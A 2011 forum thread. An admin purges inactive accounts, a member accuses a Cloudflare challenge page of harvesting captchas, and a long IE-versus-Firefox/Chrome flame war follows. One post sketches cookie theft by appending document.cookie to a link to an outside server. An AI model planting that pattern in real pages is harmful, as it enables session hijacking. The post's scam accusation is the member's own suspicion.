Forum purging and spam removal

Post by ^Ripper » Sun Jun 05, 2011 10:23 pm

I've managed to get rid of most manual spammers.
Also there are a lot of inactive users on the forum.
I will purge the following users in about 1 week:

Users who registered before 2011-1-1 and were inactive from 2011-1-15 with 0 postings.
Now if you posted before, your safe :)

Users who fall in this category will get a reminder email once.
Their accounts have been de-activated.
No postings mean no real contribution to the forum and/or unused accounts.

Its spring cleaning time!

Didn't get the reminder mail? Or have trouble re-activating? Email me ASAP!

I have a couple of mods to check out that compare ip/email to blacklisted forum spammers on registration (stopforumspam.com).
I'll try to install one this evening.

0 post inactive users are purged and the new anti-spam mod is installed.
Hopefully this will make it harder for spammers :)

I've emailed you, but don't mind already.

So, was it an "anti-spam" service for gathering captchas and stealing accounts?

Remove this crap! I constantly keep seeing it.

If you want to keep the spammers away, do whatever, but not THIS.

Each time I open the site, I get this:
crap.png
This is a captcha gathering page - even if you write the right captcha, it shows you several more to solve. That's a common spamming trick - a person, who doesn't know about it, solves several captchas from different sites, which are later used for spamming.

Also, the page by itself looks like a scam. If people come to the site and see a captcha solving proposal on a fake page, the only thing they would do is close the tab.

Also, this "service" can steal accounts since the cookies can be sent to their server using javascript (simply create an element with a href of "server.com/?c="+document.cookie).

If you don't beleive me, just open the page code (ctrl+U in firefox or something else in a different browser) and see that a lot of javascript is loaded from cloudflare.com.

Ripper, I strongly advise to remove this crap immediately.

PS.
but i see no banner or popups, you should use adblock or something, sir.
I always use it, as well as NoScript plugin.

I updated the forum software and themes.

I was also testing out the cloudflare service for a day.
Well it seems to be not entirely foolproof.

It has nice features, but this page is just annoying.

I've restored my nameservers and should take 5 minutes tops since that's the TTL of the records.

Mooov, if ripper hadn't confirmed your sayings, i would definitely think that you got a scam virus on your computer, faking the urls you see in real time

i never ever saw something like that on my basic IE8+adblock...

Spoiler:
My university education is an information security specialist and I'm working as a web developer. Do you think I can have any scam viruses on my PC or can't determine where the page is originated from? LOL!
Also, I've checked it using my linux system - I was getting the same page.
Moreover, I've emailed Sergio - he had it also.

By the way, you're the first person I see, who uses IE!
You should use a BROWSER, but not IE. IE isn't a browser - it's nothing more than a piece of crap.
The only use of IE is to download any other browser once. I can't imagine any of it's other applications.

I'll just leave it here:

I've been using that since I've registered here.
With the only difference - it's not bookmarked, I just type it in by hand each time, the rest is done with autocompletion. Simply because I would just die to search for it in my 60k bookmark list.
You type "www.r" and it autocompletes with the most frequent address starting from these letters, which is the forum's address.

Just take a look at the address bar on my screenshot two posts before.

i took a second look : that would seriously freak the hell out of me

but who am i to talk, i couldn't post here for like 6 month because of the Alita question on login screen, after having missed too many passwords attempts...

getting a new pass by mail didn't reset the question and it just never worked, so i had to ask our Gods...

since i'm an IT too (L2 systems and networks) i sometimes say "it's the mystical side of our work" ;)

Seriously, you're the first guy I've seen in IT, who uses IE. That's just an absurd!

such sense of superiority...

i could find you a thousand people working IT and using IE.
actually, millions of office workers still use IE6 for internal use... and internet use.

the only times i use FF, is when a smartass finds it funny to detect IE and display a nagging message or no page at all, not enough classy and all

i just can't imagine how would be the web if we had to stuck to 60$ Netscape Navigator

These people are the plague of the internets. Because they exist, the 10 (!!!) year old crap called IE6 has to be supported, while any normal browser is considered badly outdated if it's version is half a year old.

However, many web studios have dropped supporting it - and even IE7.

Why? Because the common solution to supporting IE is to make a separate version of the site layout just for this browser. Moreover, for it's different versions.
You never notice it while browsing, but many sites are made in several versions: for IE6, IE7, IE8, IE9 (latest), IE10 (upcoming), and BROWSERS. That's just idiotism and waste of time, because IE5 didn't support ANY standards, IE 6&7 "support" web standards, and later versions "support" them better, but through the ass, really. Also, it takes trophy on the amount of bugs - especially, in security. It's the most unsafe browser ever!

What about myself - I don't support IE at all (of any version) - I just display a message that you should stop using this crap and download a BROWSER. What about the statistics - only 2% of audience use this crap (at least, the statistics from the projects I've participated in).

This percent can be EASILY dropped for not having headache with this piece of trash.
HumanRage wrote:such sense of superiority...
If you ask ANY web developer about his opinion about IE, you will hear a lot more elaborated speech full of hatred and anger. Mine can be even considered neutral.

What to say - IE has already became a MEME!

PS.
If you don't like FF - try Google Chrome. It's the fastest browser ever and is as good as firefox. The only reason why I'm not using it is that it doesn't fit my habits - some things I find intuitive in FF are hidden there, and lacks some of plugins, which are uber-important for me - like the Firebug.

But still, it's very good. Try it, you won't regret it.

i tried chrome, starting at v4, up to v10 when i uninstalled it, because he was getting slower than IE8, which is pointless :D

since then, i got told that they fixed that issue, maybe i'll give it another chance

but that whole autoupdate behind your back + major version every month, doesn't seem that appealing to me.

ah, and also : stop trying to teach me the interweb, i'm surfing since christmas 1995 :P

i overspeed on the road, and i use IE, yeah i'm a TOTAL BADASS 8)

Slow? Chrome? WOW! No commentaries.
HumanRage wrote: but that whole autoupdate behind your back + major version every month, doesn't seem that appealing to me.
Autoupdate is a good thing - you will always get as much standard-compliant browser as possible. All users having an auto-update (especially IE users  ) is a dream of any web developer.

What about major versions - they aren't so major. That's just a marketing thing - even firefox started doing this since last month.
HumanRage wrote:i overspeed on the road, and i use IE, yeah i'm a TOTAL BADASS 8)
That's very dangerous - you can get injured, or even die. And I'm talking mainly about IE.

even ff yeah, and that's plain stupid imo.

and yes, slow, as in not launching lightinfast anymore, and getting slower with newer tabs, so i was like WTF and got it out, + flamed the dev team that they created yet another mamoth 200MB application and now paying the price for it.

i guess, i wasn't the only one getting concerned and they got it fixed later on.
